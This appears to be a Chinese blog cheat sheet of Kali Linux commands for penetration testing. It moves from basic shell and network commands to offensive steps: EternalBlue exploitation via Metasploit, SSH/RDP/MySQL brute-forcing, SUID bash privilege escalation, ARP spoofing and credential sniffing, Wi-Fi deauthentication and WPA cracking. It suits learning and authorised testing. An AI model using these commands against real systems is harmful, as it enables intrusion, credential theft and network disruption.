目录
- 一、基础系统/目录操作
- 二、文件编辑/查看操作
- 三、网络基础操作
- 四、信息收集命令
- 五、端口/网段扫描命令
- 六、漏洞探测/利用基础(Metasploit示例)
- 七、密码破解命令
- 八、提权/本地渗透命令
- 九、嗅探抓包/流量分析
- 十、无线渗透命令
一、基础系统/目录操作
ls--- 列出当前目录文件/文件夹ls -l--- 详细列出文件属性(权限、大小、修改时间)ls -a--- 显示隐藏文件(包含.和..)ls -la--- 详细显示所有文件(含隐藏)cd /--- 切换到根目录cd ..--- 切换到上一级目录cd ~或cd--- 切换到当前用户主目录cd ---- 切换到上一次操作的目录pwd--- 查看当前所在绝对路径mkdir test--- 创建名为test的文件夹mkdir -p /a/b/c--- 递归创建多级目录rm file--- 删除单个文件rm -f file--- 强制删除文件(不提示)rm -r dir--- 递归删除文件夹及内部内容 危险命令 :rm -rf /或rm -rf /*会瞬间清空整个系统。永远先用ls确认路径,再执行带-r或-rf的删除。rm -rf dir--- 强制递归删除(高危,谨慎使用)cp file /tmp/--- 复制文件到指定目录cp -r dir /tmp/--- 递归复制文件夹mv file /tmp/--- 移动文件到指定目录(也可用于重命名)mv oldname newname--- 给文件/文件夹重命名touch newfile--- 创建空文件chmod 777 file--- 赋予所有用户读写执行权限 极度危险 ,生产环境几乎从不使用777。常见安全组合:文件chmod 644,目录/可执行脚本chmod 755。chmod 755 file--- 所有者读写执行,其他用户读执行chown root:root file--- 修改文件所属用户和组为rootdf -h--- 查看磁盘空间(人性化显示)free -h--- 查看内存/交换分区使用情况
二、文件编辑/查看操作
cat file--- 正序查看文件全部内容tac file--- 倒序查看文件全部内容head file--- 查看前10行head -n 20 file--- 查看前20行tail file--- 查看后10行tail -n 20 file--- 查看后20行tail -f file--- 实时监控文件变化(日志分析最常用)more file--- 分页查看(空格/回车翻页)less file--- 高级分页查看(支持上下翻页、/搜索)nano file--- 简易文本编辑器vim file--- 高级编辑器(按i编辑,Esc退出编辑,:wq保存退出,:q!强制退出)grep "keyword" file--- 在文件中搜索关键词grep -i "keyword" file--- 忽略大小写搜索grep -r "keyword" dir--- 递归搜索整个目录wc -l file--- 统计文件行数
三、网络基础操作
ifconfig--- 查看/配置网络接口(旧命令)ip a或ip addr--- 现代推荐命令,查看网络接口详情ip addr add 192.168.1.100/24 dev eth0--- 临时添加IP(重启丢失) 网卡名说明:eth0仅为示例,现代系统常见ens33/enp03/wlan0等,用ip link查看真实名称。很多工具支持-i any(所有接口)。永久配置建议用nmcli或 Netplan。route -n--- 查看路由表ip route--- 现代路由查看/配置命令ping ip--- 测试连通性(默认无限发送,按Ctrl+C停止)ping -c 4 ip--- 发送4个包后停止ping -i 0.5 ip--- 每0.5秒发一个包(快速探测)netstat -tulnp--- 查看监听端口及进程(过时,推荐ss)netstat -an--- 查看所有连接(过时)ss -tulnp--- 现代首选,快速查看监听端口 口诀 :新系统一律用ss!arp -a--- 查看ARP缓存表arp -s ip mac--- 静态绑定IP和MAChostname--- 查看主机名hostname newname--- 临时修改主机名curl url--- 访问URL并显示内容wget url--- 下载文件到当前目录wget -O newname url--- 下载并自定义文件名curl ifconfig.me--- 查看本机公网IP(备选:curl icanhazip.com或curl ip.sb)telnet ip port--- 测试指定端口是否开放
四、信息收集命令
uname -a--- 查看内核版本、系统架构、主机名等cat /etc/issue--- 查看系统发行版简要信息cat /etc/os-release--- 详细查看系统版本信息(推荐)whoami--- 查看当前登录用户名who--- 查看当前所有登录系统的用户w--- 查看当前登录用户及正在执行的操作last--- 查看系统登录历史记录ps -ef--- 查看所有运行的进程(详细信息)ps aux--- 以BSD格式查看所有进程top--- 实时监控系统进程(资源占用、PID等,按q退出)pstree--- 以树形结构查看进程关系netstat -antp--- 查看所有TCP连接及对应进程(过时,建议用ss)find / -name "*.sh"--- 从根目录搜索所有.sh后缀的文件 提示:从根目录搜索很慢,建议指定路径如find /home -name ...find / -perm -4000 -type f 2>/dev/null--- 搜索SUID权限文件(常用于提权线索)arp-scan -l或arp-scan --localnet--- 扫描局域网存活主机(Kali常用)fping -g 192.168.1.0/24--- 快速扫描C段存活主机cat /etc/passwd--- 查看系统所有用户信息cat /etc/group--- 查看系统所有用户组信息cat /var/log/auth.log--- 查看系统认证日志(登录、sudo操作等)lsof -i:80--- 查看占用80端口的进程
五、端口/网段扫描命令
nmap ip--- 默认扫描目标(1000个常用端口)nmap -sn 192.168.1.0/24--- 仅扫描网段存活主机(无端口扫描)nmap -p 80 ip--- 仅扫描80端口nmap -p 1-65535 ip--- 扫描所有端口nmap -p 80,443,22 ip--- 扫描指定多个端口nmap -sT ip--- TCP全连接扫描(易被检测)nmap -sS ip--- TCP SYN半开放扫描(隐蔽,默认推荐) 区别:-sS只发SYN,不完成握手,不易被记录;-sT完整握手,像正常访问。nmap -sU ip--- UDP端口扫描nmap -sV ip--- 扫描端口并探测服务版本信息nmap -O ip--- 探测目标操作系统类型(大写O)nmap -A ip--- 全面扫描(存活+端口+版本+OS+脚本)nmap -T4 ip--- 提高扫描速度(-T0最慢,-T5最快)nmap -oN result.txt ip--- 保存为普通文本nmap -oX result.xml ip--- 保存为XML格式nmap --script=vuln ip--- 加载漏洞脚本探测已知漏洞 2026年提示:nmap脚本引擎更新频繁,vuln脚本false positive较多,建议结合-sV使用。nmap --script=brute ip--- 加载暴力破解脚本(弱口令尝试)nmap -Pn ip--- 跳过主机存活检测,直接扫描端口(目标禁ping时必加)nmap -D RND:10 ip--- 使用随机10个假IP欺骗源地址(隐藏真实IP)masscan 192.168.1.0/24 -p 80,443--- 超高速端口扫描(比nmap快得多)zenmap--- 打开Nmap图形化界面(适合新手)
六、漏洞探测/利用基础(Metasploit示例)
msfconsole或msfconsole -q--- 打开Metasploit控制台(-q安静模式推荐)search ms17-010--- 搜索指定漏洞模块use exploit/windows/smb/ms17_010_eternalblue--- 加载漏洞利用模块show options--- 查看模块所需参数set RHOSTS ip--- 设置目标IPset LHOST ip--- 设置本机攻击IP(反弹shell用)set LPORT 4444--- 设置监听端口exploit或run--- 执行漏洞利用back--- 退出当前模块sessions -l--- 查看所有反弹shell会话sessions -i 1--- 进入编号1的shell会话sessions -k 1--- 关闭编号1的会话nessusd start--- 启动Nessus服务(旧写法)nessuscli scan --launch 123--- 启动指定Nessus扫描任务 注意:Nessus新版本多用systemctl管理或web界面操作。
七、密码破解命令
hydra -l root -P pass.txt ssh://ip--- 破解SSH(用户名+密码字典) 提示:在线暴力易被封IP,可加-t 4限制线程。hydra -L user.txt -P pass.txt rdp://ip--- 破解RDPhydra -l admin -P pass.txt http-get://ip--- 破解HTTP GET登录hydra -l admin -P pass.txt mysql://ip--- 破解MySQLjohn --wordlist=pass.txt passwd--- John the Ripper 破解系统密码文件john --show passwd--- 查看已破解密码hashcat -m 0 hash.txt pass.txt--- Hashcat破解MD5hashcat -m 1000 hash.txt pass.txt--- 破解NTLMcrunch 6 8 0123456789 -o 6-8num.txt--- 生成6-8位纯数字字典crunch 8 8 abc123 -o 8char.txt--- 生成8位字母+数字字典cewl url -w webpass.txt--- 从网站爬取内容生成专属字典medusa -u root -P pass.txt -h ip -M ssh--- 美杜莎破解SSH(速度快)sqlmap -u url --forms--- 检测SQL注入并尝试破解数据库fcrackzip -D -p pass.txt test.zip--- 破解ZIP压缩包7z x test.zip -p123456--- 用已知密码解压加密ZIP
八、提权/本地渗透命令
sudo -l--- 查看当前用户可用的sudo命令(提权核心)sudo su--- 以root权限切换用户su root--- 切换到root(需root密码)id--- 查看当前用户UID、GID、组信息find / -type f -perm -4000 2>/dev/null--- 搜索SUID文件 常见可利用:find、vim、nano、less、more、cp等(视系统版本而定)find / -type f -perm -2000 2>/dev/null--- 搜索SGID文件chkrootkit--- 检测rootkit后门unshare -rm /bin/bash--- 利用内核漏洞临时提权(老漏洞,成功率低)cp /bin/bash /tmp/bash; chmod 4755 /tmp/bash--- 制作SUID bash./tmp/bash -p--- 执行SUID bash提权 现代防护:很多系统有no-new-privs等机制,成功率大幅下降,仅学习参考。ps aux | grep root--- 查看root进程(寻找提权突破口)cat /proc/cmdline--- 查看启动参数(找提权线索)lsmod--- 查看加载的内核模块exploit-db--- 打开Exploit-DB漏洞库(Kali内置)
九、嗅探抓包/流量分析
tcpdump -i any--- 在所有接口抓包(推荐any而非eth0)tcpdump -i any -w cap.pcap--- 抓包保存为pcap文件tcpdump -i any port 80--- 仅抓80端口流量wireshark--- 打开图形化抓包工具tshark -i any--- Wireshark命令行版arpspoof -i any -t 192.168.1.100 192.168.1.1--- ARP欺骗 2026年推荐:bettercap(功能更全,支持HTTPS/DNS等中间人攻击)driftnet -i any--- 嗅探局域网图片流量urlsnarf -i any--- 嗅探URL访问记录dsniff -i any--- 综合嗅探(捕获FTP/HTTP/SMB凭证)ngrep -d any "password"--- 过滤包含关键词的网络流
十、无线渗透命令
airmon-ng start wlan0--- 开启监听模式(网卡变为wlan0mon)airmon-ng stop wlan0mon--- 关闭监听模式airodump-ng wlan0mon--- 扫描周围WiFiairodump-ng -c 6 --bssid XX:XX:XX:XX:XX:XX -w wifi wlan0mon--- 定向抓包aireplay-ng --deauth 0 -a XX:XX:XX:XX:XX:XX wlan0mon--- 无限deauth断网攻击aircrack-ng -w pass.txt wifi-01.cap--- 字典破解WPA/WPA2reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vW--- 破解WPSwash -i wlan0mon--- 扫描开启WPS的设备kismet--- 无线流量嗅探/扫描(图形化)bully -i wlan0mon -b XX:XX:XX:XX:XX:XX--- WPS破解(成功率较高) 提示:运行前常需airmon-ng check kill杀干扰进程
如果未安装kali,可以参考作者另一篇文章:https://www.cnblogs.com/xize766/articles/19548059/vm-kali-install
温馨提示:本文仅供学习参考,任何违法行为均与作者无关。